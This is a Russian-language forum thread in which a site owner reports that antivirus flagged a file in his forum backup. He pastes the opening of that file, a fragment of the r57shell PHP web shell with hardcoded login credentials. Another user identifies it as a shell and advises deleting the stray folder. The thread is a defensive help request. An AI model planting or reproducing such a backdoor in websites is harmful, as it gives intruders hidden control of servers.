Троян на форуме

Автор Schedrin, 31 мая 2014, 23:02:47

« назад - далее »

0 Пользователи и 1 гость просматривают эту тему.

Печать
Вниз Страницы1
Действия пользователя

Schedrin

31 мая 2014, 23:02:47
Ничего, как говорится, не предвещало...

Форум работал отлично, никаких проявлений вредоносного кода не было, антивир никогда не жаловался, etc.
Скачал на комп бэкап форума и через час зачем-то запустил Касперского проверить диск "С"....   Оба-на - скачанный файл содержит троянскую программу! Конкретно в public_html/libs/forum_lib.php сидит Вackdoor.PHP.Rst.f.

Захожу в панель управления хостингом...  Текущий путь: /  var/  www/  мой сайт/  data/  public_html/  libs/ 
В папке libs файл forum_lib.php имеет такой код:

Код Выделить 
<?php$language='ru';$auth = 1; $name='blein'; $pass='psw123'; /******************************************************************************************************/error_reporting(0);set_magic_quotes_runtime(0);[at]set_time_limit(0);[at]ini_set('max_execution_time',0);[at]ini_set('output_buffering',0);$safe_mode = [at]ini_get('safe_mode');$version = "1.24";if(version_compare(phpversion(), '4.1.0') == -1) { $_POST   = &$HTTP_POST_VARS; $_GET    = &$HTTP_GET_VARS; $_SERVER = &$HTTP_SERVER_VARS; }if ([at]get_magic_quotes_gpc()) { foreach ($_POST as $k=>$v)  {  $_POST[$k] = stripslashes($v);  } foreach ($_SERVER as $k=>$v)  {  $_SERVER[$k] = stripslashes($v);  } }if($auth == 1) {if (!isset($_SERVER['PHP_AUTH_USER']) || $_SERVER['PHP_AUTH_USER']!==$name || $_SERVER['PHP_AUTH_PW']!==$pass)   {   header('WWW-Authenticate: Basic realm="Who are you ?"');   header('HTTP/1.0 401 Unauthorized');   exit("<b><a href=http://rst.void.ru>r57shell</a> : Access Denied</b>");   }}   $head = '<!--


Вопрос. Что делать?  Что именно удалять?

Schedrin

#2
01 июня 2014, 12:52:03
Цитата: digger® от 01 июня 2014, 00:30:22
Это шелл, его и удалять.
Нужно полностью удалить всю папку libs?
Или папку оставить, но удалить находящийся в ней файл forum_lib.php?

digger®

#3
01 июня 2014, 12:55:14
Цитата: Schedrin от 01 июня 2014, 12:52:03
Нужно полностью удалить всю папку libs?
Или папку оставить, но удалить находящийся в ней файл forum_lib.php?
В дистрибутиве форума нет папки libs, так что она к нему вообще не относится.

Schedrin

#4
01 июня 2014, 21:11:31
Цитата: digger® от 01 июня 2014, 12:55:14
В дистрибутиве форума нет папки libs, так что она к нему вообще не относится.
Папку libs снес.
Сохранил бэкап - проверил Касперским - ща все ОК.
Спасибо.
Печать
Вверх Страницы1
Действия пользователя